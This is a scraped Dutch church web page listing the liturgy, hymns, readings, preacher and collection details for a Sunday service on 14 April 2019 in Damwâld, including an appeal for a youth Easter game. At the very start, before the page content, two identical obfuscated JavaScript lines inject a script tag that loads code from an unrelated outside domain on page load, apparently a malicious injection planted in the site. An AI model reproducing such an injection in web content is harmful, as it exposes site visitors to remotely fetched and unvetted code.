;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 14 april 2019 9:30 uur - PKN Damwâld
zondag 14 april 2019
09:30 uur
Voorbereiding Heilig Avondmaal

Kerkdienst zondag 14 april 2019 9:30 uur

Informatie

Voorganger:Ds. G.J. Otter
Organist:Jaap van der Horn
Mededeling:Voorbereiding Heilig Avondmaal
Liturgie
Lied voor de dienst Elb 170 : 1 en 2
Welkom
Intochtslied Ps 118 : 7 en 8
Stil gebed, Votum en groet
We zingen: Gez 183 : 1 en 4
Wetslezing .
We zingen: Ps 139 : 1 en 14
Gebed
We lezen: Mt.21: 1 - 17 en Op.19: 6 - 16
We zingen: Gez. 117 : 1 en 4
Preek .
We zingen: Ps. 72 : 1 en 4
Dankzegging en voorbede
Collecte
Slotlied Elb 289 : 1 en 2
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Eerste collecte: Jeugdwerk

40 Dagentijd: Jeugdwerk - Jongeren doorleven het Paasverhaal
Veel Christelijke jongeren hebben het Paasverhaal al vaak gehoord. Komt de boodschap van Pasen bij hen nog wel aan? JOP, Jong Protestant, ontwikkelde een verrassend nieuw spel voor kerkelijke jongeren: de PaasChallenge. In dit spel met 'Wie-is-de-mol'-achtige elementen kruipen jongeren een nacht lang in de huid van een hoofdpersoon uit het Paasverhaal. Ze krijgen te maken met emoties als achterdocht, eenzaamheid, vermoeidheid en troost. Een deel van de opdrachten speelt zich buiten af, de ontknoping vindt plaats op Paasmorgen. De eerste editie was een groot succes: bijna 2.000 jongeren van maar liefst 150 jeugdgroepen uit heel Nederland deden mee. Collecteer mee, zodat JOP rond Pasen jongeren met dit uitdagend spel bij de kerk (blijven) betrekken

Tweede collecte: Kerk
Uitganscollecte: Kerk